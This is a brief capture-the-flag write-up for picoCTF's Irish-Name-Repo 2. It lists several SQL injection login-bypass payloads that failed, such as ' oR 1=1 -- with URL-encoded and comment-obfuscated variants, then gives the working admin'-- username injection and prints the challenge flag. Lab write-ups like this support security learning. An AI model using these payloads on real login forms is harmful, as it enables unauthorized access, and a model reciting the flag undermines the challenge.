This content originally appeared on DEV Community and was authored by David Disu
Coming from this challenge’s prequel Irish-Name-Repo 1 – picoCTF ’19, I was hellbent thinking I had to encode the password parameter. I tried several SQL injection variations, including:
' oR 1=1 -- – case manipulation
%27%20%20%6f%72%20%31%3d%31%20%2d%2d– URL encoding
'/**/ or /**/ 1=1 /**/ -- – Comment obfuscation
00%' or 1=1 -- – null hex encoding
…and other combinations but to no avail. Once I shifted my attention, the solution became straightforward.
STEPS TO SOLUTION
use admin'-- in the username parameter.
Breakdown:
-
admin– value for username query. -
'– closes the input string. -
--– comments out the remaining query.
FLAG: picoCTF{m0R3_SQL_plz_fa983901}
PWNSOME REFERENCES
https://portswigger.net/support/sql-injection-bypassing-common-filters
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
This content originally appeared on DEV Community and was authored by David Disu